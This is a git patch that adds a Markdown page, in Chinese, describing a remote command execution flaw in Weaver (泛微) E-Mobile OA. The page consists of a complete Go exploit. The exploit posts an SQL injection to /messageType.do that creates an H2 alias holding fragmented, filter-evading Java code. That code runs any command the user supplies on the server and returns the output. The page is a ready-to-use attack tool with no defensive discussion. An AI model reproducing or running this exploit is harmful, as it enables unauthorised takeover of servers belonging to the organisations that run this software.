From dd85c9b139a37ad9314cf31cf601b5ea85900e9f Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 25 Oct 2023 21:50:19 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AE=E7=A7=BB=E5=8A=A8?= =?UTF-8?q?=E5=8A=9E=E5=85=ACOA=E8=BF=9C=E7=A8=8B=E5=91=BD=E4=BB=A4?= =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 泛微移动办公OA远程命令执行漏洞.md | 71 +++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 泛微移动办公OA远程命令执行漏洞.md diff --git a/泛微移动办公OA远程命令执行漏洞.md b/泛微移动办公OA远程命令执行漏洞.md new file mode 100644 index 0000000..9e66e7e --- /dev/null +++ b/泛微移动办公OA远程命令执行漏洞.md @@ -0,0 +1,71 @@ + +## 泛微移动办公OA远程命令执行漏洞 + +## go语言 poc +```go +package main + +import ( + "bytes" + "fmt" + "github.com/hpifu/go-kit/hflag" + "io/ioutil" + "mime/multipart" + "net/http" + "net/url" + "os" + "strings" +) + +func main() { + t, c := getParam() + exploit(t, c) +} + +func exploit(host, command string) { + p := "1';CREATE ALIAS if not exists MzSNqKsZTagm AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass(\"com.caucho.server.dispatch.ServletInvocation\").getMet','hod(\"getContextRequest\").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField(\"_response\");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod(\"getWriter\");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter(\"\\\\A\");writer.write(scan','ner.hasNext()?sca','nner.next():\"\");}');CALL MzSNqKsZTagm('" + url.QueryEscape(command) + "');--" + c := http.Client{} + buffer := &bytes.Buffer{} + writer := multipart.NewWriter(buffer) + field, _ := writer.CreateFormField("method") + field.Write([]byte("create")) + formField, _ := writer.CreateFormField("typeName") + formField.Write([]byte(p)) + _ = writer.Close() + target := strings.Replace(host+"/messageType.do", "//mess", "/mess", 1) + request, _ := http.NewRequest(http.MethodPost, target, strings.NewReader(buffer.String())) + request.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36") + request.Header.Set("Accept", "*/*") + request.Header.Set("Connection", "close") + request.Header.Set("Content-Type", writer.FormDataContentType()) + request.Header.Set("Content-Length", "1142") + request.Header.Set("Accept-Encoding", "") + do, err := c.Do(request) + if err != nil { + fmt.Println(err) + } + defer func() { + _ = do.Body.Close() + }() + all, err := ioutil.ReadAll(do.Body) + if err != nil { + fmt.Println(err) + } + if string(all) == "{\"status\":false}" { + fmt.Println("无效的命令,也许是服务器不支持或其他情况") + return + } + result := strings.Replace(fmt.Sprintf("%s", all), "{\"status\":false,\"ID\":\"1\",\"msg\":\"推送类型已存在\"}", "", -1) + fmt.Println("\n", result) +} + +func getParam() (t, c string) { + hflag.AddFlag("target", "泛微E-MobileServer-地址", hflag.Required(), hflag.Shorthand("t")) + hflag.AddFlag("command", "待执行的系统命令", hflag.Required(), hflag.Shorthand("c")) + if err := hflag.Parse(); err != nil { + fmt.Println(hflag.Usage()) + os.Exit(0) + } + return hflag.GetString("target"), hflag.GetString("command") +} +```